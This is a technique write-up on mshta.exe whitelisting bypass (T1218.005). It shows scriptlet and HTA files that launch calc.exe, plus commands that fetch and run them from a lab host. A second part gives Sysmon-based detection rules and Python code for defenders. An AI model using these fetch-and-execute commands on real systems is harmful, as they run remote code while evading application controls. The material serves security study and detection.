MSHTA
MSHTA code execution - bypass application whitelisting.

Execution

Writing a scriptlet file that will launch calc.exe when invoked, hosted at http://10.0.0.5/m.sct:

<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="Progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>

<public>
<method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
function Exec() {
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
}
]]>
</script>
</scriptlet>
Invoking the scriptlet file hosted remotely:

# from powershell
cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();

Observations

As expected, calc.exe is spawned by mshta.exe. Worth noting that mshta and cmd exit almost immediately after invoking calc.exe, so the parent processes are gone by the time the child is inspected.
As a defender, look at Sysmon logs for mshta.exe establishing network connections (Event ID 3), and at process-creation events (Event ID 1) for suspicious command lines: mshta.exe being handed a javascript:/script: URL or a GetObject call, and mshta.exe appearing as the parent of other processes.
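As an added detection example (not code from the original page), the three observations above turned into checks over Sysmon-style records; the events below are constructed for this example and only mirror Sysmon's field names for Event ID 1 (process creation) and Event ID 3 (network connection), and the detection label names are my own.

```python
import re

# Constructed Sysmon-style records (made up for this example; field names follow
# Sysmon Event ID 1 process creation and Event ID 3 network connection).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'cmd /c mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();'},
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'mshta.exe javascript:a=(GetObject("script:http://10.0.0.5/m.sct")).Exec();close();'},
    {"EventID": 3, "Image": r"C:\Windows\System32\mshta.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 80},
    {"EventID": 1, "Image": r"C:\Windows\System32\calc.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe", "CommandLine": "calc.exe"},
    # Benign-looking control: mshta opening a local .hta with no inline script or URL.
    {"EventID": 1, "Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Program Files\Vendor\help.hta"'},
]

# Arguments that turn mshta into a proxy for remote or inline script: the
# javascript:/vbscript: protocol handlers, script: monikers, GetObject, or a URL.
SUSPICIOUS_ARGS = re.compile(r"javascript:|vbscript:|script:|GetObject\(|https?://", re.I)

def is_mshta(path):
    """True if the image path's file name is mshta.exe (case-insensitive)."""
    return path.lower().rsplit("\\", 1)[-1] == "mshta.exe"

def classify(event):
    """Return the detection labels that fire for one event (empty list if none)."""
    hits = []
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        # Catches both mshta.exe itself and a cmd.exe wrapper that launches it.
        if "mshta" in cmd.lower() and SUSPICIOUS_ARGS.search(cmd):
            hits.append("mshta_suspicious_commandline")
        # The page's observation: calc.exe shows up as a child of mshta.exe.
        if is_mshta(event.get("ParentImage", "")):
            hits.append("mshta_child_process")
    elif event.get("EventID") == 3 and is_mshta(event.get("Image", "")):
        # mshta.exe has little legitimate reason to open network connections.
        hits.append("mshta_network_connection")
    return hits

def scan(events):
    """Run classify() over a list of events; returns [(event_index, label), ...]."""
    return [(i, label) for i, ev in enumerate(events) for label in classify(ev)]
```

Running scan(SAMPLE_EVENTS) flags the first four records and leaves the local-HTA control alone; the same URL check also catches the remote-HTA form (mshta.exe http://.../m.hta) shown in the Bonus section.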

Bonus

The hta file can be invoked like so:

mshta.exe http://10.0.0.5/m.hta

or by navigating to the file itself, launching it and clicking run. The file hosted at http://10.0.0.5/m.hta:

<html>
<head>
<script language="VBScript">
Sub RunProgram
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "calc.exe"
End Sub
RunProgram()
</script>
</head>
<body>
Nothing to see here..
</body>
</html>

References

Signed Binary Proxy Execution: Mshta, Sub-technique T1218.005 - Enterprise | MITRE ATT&CK®